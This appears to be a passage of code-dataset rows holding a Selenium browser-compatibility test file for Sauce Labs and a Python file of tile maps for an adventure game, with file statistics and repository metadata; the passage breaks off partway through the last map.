| 0.064954
| 0.476089
| 47,634
| 734
| 553
| 64.896458
| 0.766188
| 0.034387
| 0
| 0.86087
| 0
| 0.052174
| 0.396221
| 0.039831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008696
| false
| 0.013043
| 0.005797
| 0
| 0.017391
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9cd732bbb3bab6571256b7e251bd9ac5290034ff
| 1,620
|
py
|
Python
|
python/se4-w3c/tests/test_yosemite.py
|
saucelabs-training/platform-config-tests
|
11dfab8f9be2fe118ed0b0fa4adebb75a5f1a64c
|
[
"MIT"
] | 1
|
2021-11-17T22:29:42.000Z
|
2021-11-17T22:29:42.000Z
|
python/se4-w3c/tests/test_yosemite.py
|
saucelabs-training/platform-config-tests
|
11dfab8f9be2fe118ed0b0fa4adebb75a5f1a64c
|
[
"MIT"
] | null | null | null |
python/se4-w3c/tests/test_yosemite.py
|
saucelabs-training/platform-config-tests
|
11dfab8f9be2fe118ed0b0fa4adebb75a5f1a64c
|
[
"MIT"
] | 1
|
2021-11-17T22:29:35.000Z
|
2021-11-17T22:29:35.000Z
|
def test_late_chrome(helpers):
from selenium.webdriver.chrome.options import Options as ChromeOptions
options = ChromeOptions()
options.set_capability('browserVersion', '87')
options.set_capability('platformName', 'OS X 10.10')
sauce_options = {}
options.set_capability('sauce:options', sauce_options)
driver = helpers.start_driver(options)
helpers.validate_google(driver)
def test_early_chrome(helpers):
from selenium.webdriver.chrome.options import Options as ChromeOptions
options = ChromeOptions()
options.set_capability('browserVersion', '75')
options.set_capability('platformName', 'OS X 10.10')
sauce_options = {}
options.set_capability('sauce:options', sauce_options)
driver = helpers.start_driver(options)
helpers.validate_google(driver)
def test_late_edge(helpers):
from selenium.webdriver.edge.options import Options as EdgeOptions
options = EdgeOptions()
options.set_capability('browserVersion', '81')
options.set_capability('platformName', 'OS X 10.10')
sauce_options = {}
options.set_capability('sauce:options', sauce_options)
driver = helpers.start_driver(options)
helpers.validate_google(driver)
def test_early_edge(helpers):
from selenium.webdriver.edge.options import Options as EdgeOptions
options = EdgeOptions()
options.set_capability('browserVersion', '79')
options.set_capability('platformName', 'OS X 10.10')
sauce_options = {}
options.set_capability('sauce:options', sauce_options)
driver = helpers.start_driver(options)
helpers.validate_google(driver)
| 31.764706
| 74
| 0.741975
| 188
| 1,620
| 6.202128
| 0.164894
| 0.102916
| 0.205832
| 0.096055
| 0.980274
| 0.980274
| 0.980274
| 0.980274
| 0.980274
| 0.980274
| 0
| 0.017467
| 0.151852
| 1,620
| 50
| 75
| 32.4
| 0.83115
| 0
| 0
| 0.777778
| 0
| 0
| 0.125926
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9cfc5b2a78c4951499a131ccc48f1bb85b42ae94
| 21,885
|
py
|
Python
|
newtiles.py
|
Owen6/Adventure
|
0f1365ccb2d307f812b547ab4278703d00f6ffdf
|
[
"MIT"
] | null | null | null |
newtiles.py
|
Owen6/Adventure
|
0f1365ccb2d307f812b547ab4278703d00f6ffdf
|
[
"MIT"
] | null | null | null |
newtiles.py
|
Owen6/Adventure
|
0f1365ccb2d307f812b547ab4278703d00f6ffdf
|
[
"MIT"
] | null | null | null |
#24x40 old 18x32
castle = [[1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
blank = [[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],
[3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3]]
filled = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
maze1 = [[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
maze2 = [[1,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1]]
openTopHall = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
openTop = [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
